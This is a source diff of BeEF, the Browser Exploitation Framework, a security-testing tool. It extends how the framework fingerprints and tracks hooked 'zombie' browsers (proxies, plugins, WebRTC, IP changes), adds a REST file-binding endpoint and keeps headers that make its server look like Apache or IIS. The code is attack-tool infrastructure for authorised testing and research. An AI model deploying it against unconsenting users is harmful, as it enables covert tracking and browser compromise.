+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -199,14 +250,6 @@ module BeEF
             self.err_msg "Invalid window size returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for JavaEnabled
-          java_enabled = get_param(@data['results'], 'JavaEnabled')
-          if BeEF::Filters.is_valid_yes_no?(java_enabled)
-            BD.set(session_id, 'JavaEnabled', java_enabled)
-          else
-            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
-          end
-
           # get and store the yes|no value for VBScriptEnabled
           vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
           if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -239,6 +282,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -247,6 +298,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -279,12 +338,12 @@ module BeEF
             self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for HasVLC
-          has_vlc = get_param(@data['results'], 'HasVLC')
-          if BeEF::Filters.is_valid_yes_no?(has_vlc)
-            BD.set(session_id, 'HasVLC', has_vlc)
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
           else
-            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
           end
 
           # get and store the value for CPU

core/main/handlers/hookedbrowsers.rb

@@ -51,13 +51,25 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!

core/main/handlers/modules/beefjs.rb

@@ -66,6 +66,12 @@ module BeEF
             hook_session_config = BeEF::Core::Server.instance.to_h
 
             # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
             if hook_session_config['beef_host'].eql? "0.0.0.0"
               hook_session_config['beef_host'] = req_host
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
@@ -74,8 +80,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
             hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
 
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

core/main/rest/api.rb

@@ -37,12 +37,19 @@ module BeEF
         end
       end
 
+      module RegisterServerHandler
+        def self.mount_handler(server)
+          server.mount('/api/server', BeEF::Core::Rest::Server.new)
+        end
+      end
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
 
       #
       # Check the source IP is within the permitted subnet

core/main/rest/handlers/server.rb

@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Server < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+        http_server = BeEF::Core::Server.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+
+        # @note Binds a local file to a specified path in BeEF's web server
+        post '/bind' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            mount = data['mount']
+            local_file = data['local_file']
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
+            status 200
+          rescue Exception => e
+            error 400
+          end
+        end
+      end
+    end
+  end
+end

core/main/router/router.rb

@@ -81,21 +81,40 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page
         get "/" do
           if config.get("beef.http.web_server_imitation.enable")
+            bp = config.get "beef.http.web_ui_basepath"
             type = config.get("beef.http.web_server_imitation.type")
             case type
               when "apache"
@@ -191,7 +210,7 @@ module BeEF
                     "<h2>If you are the website administrator:</h2>" +
                     "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
                     "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
-                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
                     "</div>" +
                     "</div>" +
                     "</div>" +
@@ -216,7 +235,7 @@ module BeEF
                     "<table>" +
                     "<tr>" +
                     "<td ID=tableProps width=70 valign=top align=center>" +
-                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
                     "<td ID=tablePropsWidth width=400>" +
                     "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
                     "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +

core/main/server.rb

@@ -22,9 +22,10 @@ module BeEF
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
+        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
         beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
         beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "http://#{beef_host}:#{beef_port}"
+        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
         @root_dir = File.expand_path('../../../', __FILE__)
         @command_urls = {}
         @mounts = {}
@@ -34,16 +35,18 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

extensions/admin_ui/api/handler.rb

@@ -12,40 +12,90 @@ module API
   # We use this module to register all the http handler for the Administrator UI
   #
   module Handler
-    
+    require 'uglifier'
+
     BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
-    
+
+    def self.evaluate_and_minify(content, params, name)
+      erubis = Erubis::FastEruby.new(content)
+      evaluated = erubis.evaluate(params)
+      minified = Uglifier.compile(evaluated)
+      write_to = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{name}.js", "w+")
+      File.open(write_to, 'w') { |file| file.write(minified) }
+
+      File.path write_to
+    end
+
+    def self.build_javascript_ui(beef_server)
+      auth_js_file = File.read(File.dirname(__FILE__)+'/../media/javascript/ui/authentication.js') + "\n\n"
+      js_files = ""
+
+      #NOTE: order counts! make sure you know what you're doing if you add files
+      esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
+      ux =  %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
+      panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js)
+
+      global_js = esapi + ux + panel
+
+      global_js.each do |file|
+        js_files << File.read(File.dirname(__FILE__)+'/../media/javascript/'+file) + "\n\n"
+      end
+
+      config = BeEF::Core::Configuration.instance
+      bp = config.get "beef.http.web_ui_basepath"
+
+      # if more dynamic variables are needed in JavaScript files
+      # add them here in the following Hash
+      params = {
+       'base_path' => bp
+      }
+
+      # process all JavaScript files, evaluating them with Erubis
+      web_ui_all = self.evaluate_and_minify(js_files, params, 'web_ui_all')
+      web_ui_auth = self.evaluate_and_minify(auth_js_file, params, 'web_ui_auth')
+
+      beef_server.mount("#{bp}/web_ui_all.js", Rack::File.new(web_ui_all))
+      beef_server.mount("#{bp}/web_ui_auth.js", Rack::File.new(web_ui_auth))
+
+    end
+
     #
     # This function gets called automatically by the server.
     #
     def self.mount_handler(beef_server)
-      # retrieve the configuration class instance
-      configuration = BeEF::Core::Configuration.instance
-      
+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      bp = config.get "beef.http.web_ui_basepath"
+
       # registers the http controllers used by BeEF core (authentication, logs, modules and panel)
       Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
 
       # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
       Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
       
       # mount the folder were we store static files (javascript, css, images) for the admin ui
       media_dir = File.dirname(__FILE__)+'/../media/'
-      beef_server.mount('/ui/media', Rack::File.new(media_dir))
+      beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
 
       
       # mount the favicon file, if we're not imitating a web server.
-      if !configuration.get("beef.http.web_server_imitation.enable")
-        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
+      if !config.get("beef.http.web_server_imitation.enable")
+        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
       end
+
+      self.build_javascript_ui beef_server
     end
+
+
     
   end
   

extensions/admin_ui/classes/httpcontroller.rb

@@ -40,8 +40,12 @@ module AdminUI
     def run(request, response)
       @request = request
       @params = request.params
-      @session = BeEF::Extension::AdminUI::Session.instance      
-      auth_url = '/ui/authentication'
+      @session = BeEF::Extension::AdminUI::Session.instance
+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      @bp = config.get "beef.http.web_ui_basepath"
+      auth_url = "#{@bp}/authentication"
       
       # test if session is unauth'd and whether the auth functionality is requested
       if not @session.valid_session?(@request) and not self.class.eql?(BeEF::Extension::AdminUI::Controllers::Authentication)
@@ -78,14 +82,14 @@ module AdminUI
 
     end
 
-    # Constructs a redirect script
-    def script_redirect(location) "<script> document.location=\"#{location}\"</script>" end
-    
-    # Constructs a html script tag
-    def script_tag(filename) "<script src=\"#{$url}/ui/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
-    
+    # Constructs a html script tag (from media/javascript directory)
+    def script_tag(filename) "<script src=\"#{$url}#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
+
+    # Constructs a html script tag (from media/javascript-min directory)
+    def script_tag_min(filename) "<script src=\"#{$url}#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>" end
+
     # Constructs a html stylesheet tag
-    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}/ui/media/css/#{filename}\" type=\"text/css\" />" end
+    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}#{@bp}/media/css/#{filename}\" type=\"text/css\" />" end
 
     # Constructs a hidden html nonce tag
     def nonce_tag 
@@ -93,6 +97,10 @@ module AdminUI
       "<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"" + @session.get_nonce + "\"/>"
     end
 
+    def base_path
+      "#{@bp}"
+    end
+
     private
     
     @eruby

extensions/admin_ui/controllers/authentication/index.html

@@ -9,7 +9,7 @@
 	
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ui/authentication.js' %>
+    <%= script_tag_min 'web_ui_auth.js' %>
 	
 	<%= stylesheet_tag 'ext-all.css' %>
 	
@@ -31,6 +31,6 @@
 </head>
 
 <body>
-	<div id="centered"><img id="beef-logo" src="/ui/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
+	<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
 </body>
 </html>

extensions/admin_ui/controllers/logs/logs.rb

@@ -63,7 +63,8 @@ class Logs < BeEF::Extension::AdminUI::HttpController
         'id' => log.id.to_i,
         'date' => log.date.to_s,
         'event' => log.event.to_s,
-        'type' => log.type.to_s
+        'type' => log.type.to_s,
+        'hooked_browser_id' => log.hooked_browser_id.to_i
       }
     end
     

extensions/admin_ui/controllers/modules/modules.rb

@@ -83,7 +83,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

extensions/admin_ui/controllers/panel/index.html

@@ -12,47 +12,8 @@
 
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ext-beef.js' %>
-
-	<!-- jQuery encoder (ESAPI way) -->
-	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
-	<%= script_tag 'esapi/Class.create.js' %>
-	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
-	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-
-    <!-- BeEF Web UI common functions-->
-    <%= script_tag 'ui/common/beef_common.js' %>
-
-	<%= script_tag 'ux/TabCloseMenu.js' %>
-	<%= script_tag 'ux/StatusBar.js' %>
-	<%= script_tag 'ux/PagingStore.js' %>
-
-	<%= script_tag 'ui/panel/common.js' %>
-	<%= script_tag 'ui/panel/DistributedEngine.js' %>
-	<%= script_tag 'ui/panel/PanelStatusBar.js' %>
-
-	<%= script_tag 'ui/panel/tabs/ZombieTabDetails.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabLogs.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabCommands.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
-
-    <%= script_tag 'wterm/wterm.jquery.js' %>
+    <%= script_tag_min 'web_ui_all.js' %>
     <%= stylesheet_tag 'wterm.css' %>
-    <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
-    <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
-    <%= script_tag 'ui/panel/PanelViewer.js' %>
-	<%= script_tag 'ui/panel/DataGrid.js' %>
-	<%= script_tag 'ui/panel/MainPanel.js' %>
-	<%= script_tag 'ui/panel/ZombieTab.js' %>
-	<%= script_tag 'ui/panel/ZombieTabs.js' %>
-	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
-	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	<%= script_tag 'ui/panel/Logout.js' %>
-	<%= script_tag 'ui/panel/WelcomeTab.js' %>
-	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
-
 	<%= stylesheet_tag 'ext-all.css' %>
 	<%= stylesheet_tag 'base.css' %>
 </head>
@@ -60,8 +21,10 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
-			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
+			<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 
 			<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> | 
 			<a id='do-logout-menu' href='#'>Logout</a>

extensions/admin_ui/controllers/panel/panel.rb

@@ -87,12 +87,13 @@ module BeEF
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
-            has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
-            has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
+            has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
+            has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
@@ -110,11 +111,12 @@ module BeEF
                 'has_flash'       => has_flash,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
-                'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
-                'has_vlc'         => has_vlc,
+                'has_wmp'         => has_wmp,
+                'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
             }

extensions/admin_ui/media/css/base.css

@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;

extensions/admin_ui/media/javascript-min/readme

@@ -0,0 +1,2 @@
+This directory will contain minified JavaScript files used by the Web UI.
+Those files are excluded from the GIT report through the .gitignore file.

extensions/admin_ui/media/javascript/ext-beef.js

@@ -1,36 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-Ext.beef = function(){
-    var msgCt;
-
-    function createBox(t, s){
-        return ['<div class="msg">',
-                '<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>',
-                '<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc"><h3>', t, '</h3>', s, '</div></div></div>',
-                '<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>',
-                '</div>'].join('');
-    }
-    return {
-        msg : function(title, format){
-            if(!msgCt){
-                msgCt = Ext.DomHelper.insertFirst(document.body, {id:'msg-div'}, true);
-            }
-            msgCt.alignTo(document, 't-t');
-            var s = String.format.apply(String, Array.prototype.slice.call(arguments, 1));
-            var m = Ext.DomHelper.append(msgCt, {html:createBox(title, s)}, true);
-            m.slideIn('t').pause(1).ghost("t", {remove:true});
-        },
-
-        init : function(){
-
-            var lb = Ext.get('lib-bar');
-            if(lb){
-                lb.show();
-            }
-        }
-    };
-}();

extensions/admin_ui/media/javascript/ui/authentication.js

@@ -12,7 +12,7 @@ Ext.onReady(function() {
 		login_form.getForm().submit({
 
 			success: function() {
-				window.location.href = '/ui/panel'
+				window.location.href = "<%= @base_path %>/panel"
 			}, 
 			failure: function() {
 				if(Ext.get('loginError') == null) {

extensions/admin_ui/media/javascript/ui/common/beef_common.js

@@ -20,7 +20,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
          */
         get_rest_token: function() {
             if(this.rest_token.length == 0){
-                var url = "/ui/modules/getRestfulApiToken.json";
+                var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
                 jQuery.ajax({
                     contentType: 'application/json',
                     dataType: 'json',

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -18,10 +18,10 @@ DataGrid = function(url, page, base) {
         storeId: 'myStore',
         baseParams: this.base,
         idProperty: 'id',
-        fields: ['id','type','event','date'],
+        fields: ['id','type','event','date','hooked_browser_id'],
         totalProperty: 'count',
         remoteSort: false,
-        sortInfo: {field: "date", direction: "DESC"}
+        sortInfo: {field: "id", direction: "DESC"}
